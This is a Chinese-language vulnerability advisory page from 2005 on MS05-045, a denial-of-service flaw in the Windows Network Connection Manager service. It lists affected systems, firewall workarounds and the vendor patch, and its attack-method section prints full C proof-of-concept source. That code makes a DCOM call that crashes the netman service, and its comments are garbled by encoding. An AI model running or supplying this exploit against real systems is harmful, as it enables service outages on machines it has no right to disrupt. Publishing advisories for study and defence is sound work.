|
Microsoft Windows网络连接管理器拒绝服务漏洞(MS05-045)
|
WWW.FSOU.COM
来源:www.fsou.com 时间:2005-10-21
|
|
|
|
涉及程序: |
Microsoft Windows程序 |
|
描述: |
Microsoft Windows网络连接管理器拒绝服务漏洞(MS05-045) |
|
详细: |
Microsoft Windows是微软发布的非常流行的操作系统,网络连接管理器是其中一个组件,允许控制网络连接。
网络连接管理器服务的netman.dll中存在拒绝服务漏洞。攻击者可以通过发送特制的网络报文导致负责管理网络和远程访问连接的组件停止响应。各种服务,包括Wuauserv、Browser、CryptSvc、TrkWks、dmserver、seclogon、lanmanserver、ShellHWDetection、AudioSrv、WZCSVC、lanmanworkstation等,都可能变得无法访问。
请注意在Windows XP Service Pack 2和Windows Server 2003 Service Pack 1上,攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞;在Windows 2000、Windows XP Service Pack 1和Windows Server 2003上,攻击者必须拥有有效的登录凭据才能利用此漏洞,匿名用户无法利用此漏洞。
<*来源:bkbll (bkbll@cnhonker.net)
链接: http://www.microsoft.com/technet/security/Bulletin/MS05-045.mspx http://www.us-cert.gov/cas/techalerts/TA05-284A.html *>
受影响系统: Microsoft Windows XP SP2 Microsoft Windows XP SP1 Microsoft Windows Server 2003 SP1 Microsoft Windows Server 2003 Microsoft Windows 2000SP4
不受影响系统: Microsoft Windows ME Microsoft Windows 98se Microsoft Windows 98
|
|
攻击方法: |
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* Windows Netman Service Local DOS Vulnerability. * * By bkbll bkbll#cnhonker.net 2005-7-14 2:49<CF><C2><CE><E7> * * TESTED ON win2k sp4 * * <D2><F2><CE><AA>Netman<CA><C7><CD><A8><B9><FD>svchost.exe -k netsvcs<C6><F4><B6><AF>, <B5><B1><B8><C3><B7><FE><CE><F1><CD><A3><D6><B9><B5><F4><BA><F3>,<C8><E7><CF><C2> <B7><FE><CE><F1><D2><B2><BD><AB><D6><D0><D6><B9>: * * EventSystem,Irmon,RasMan,NtmsSvc,SENS * */ #define _WIN32_DCOM
#include <stdio.h> #include <stdlib.h> #include <objbase.h> #include <unknwn.h> #include <windows.h>
#pragma comment(lib,"ole32")
MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E") VCConnectionManagerEnumConnection //: public IDispatch { public: virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0; virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0; virtual ULONG STDMETHODCALLTYPE Release( void) = 0; virtual HRESULT STDMETHODCALLTYPE next(void) = 0; virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0; virtual HRESULT STDMETHODCALLTYPE reset(void) = 0; virtual HRESULT STDMETHODCALLTYPE clone(void) = 0; }; CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}}; IID IID_IEnumNetConnection = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
//<D6><F7><BA><AF><CA><FD> main(int argc,char **argv) { VCConnectionManagerEnumConnection *clientcall; HRESULT hr;
printf("Windows Netman Service Local DOS Vulnerability..\n\n"); //<B3><F5><CA><BC><BB><AF> CoInitializeEx(NULL,COINIT_MULTITHREADED);
printf("DCOM Client Trying started\n"); hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall); if (hr != S_OK) { printf("CoCreateInstanceEx failed:%d\n",GetLastError()); return -1; } printf("Exploit netman service ....\n"); hr = clientcall->skip(0x80000001);//(void**)&p); if(SUCCEEDED(hr)) { printf("Call client proc Success.\n"); } else printf("Call client proc failed:%d\n",GetLastError()); hr = clientcall->Release(); CoUninitialize(); printf("Client exited.\n"); return 1; }
|
|
解决方案: |
临时解决方法:
在边界防火墙阻断: * UDP 135, 137, 138和445及TCP 135, 139, 445和593端口 * 大于1024端口上所有未经请求的入站通讯 * 任何其他特定配置的RPC端口 * 在80和443端口上监听的COM Internet Services (CIS)或RPC over HTTP(如果安装了的话)
厂商补丁:
Microsoft --------- Microsoft已经为此发布了一个安全公告(MS05-045)以及相应补丁: MS05-045:Vulnerability in Network Connection Manager Could Allow Denial of Service (905414) 链接:http://www.microsoft.com/technet/security/Bulletin/MS05-045.mspx
|
|
|
|
|
相关文章 |
|
|
|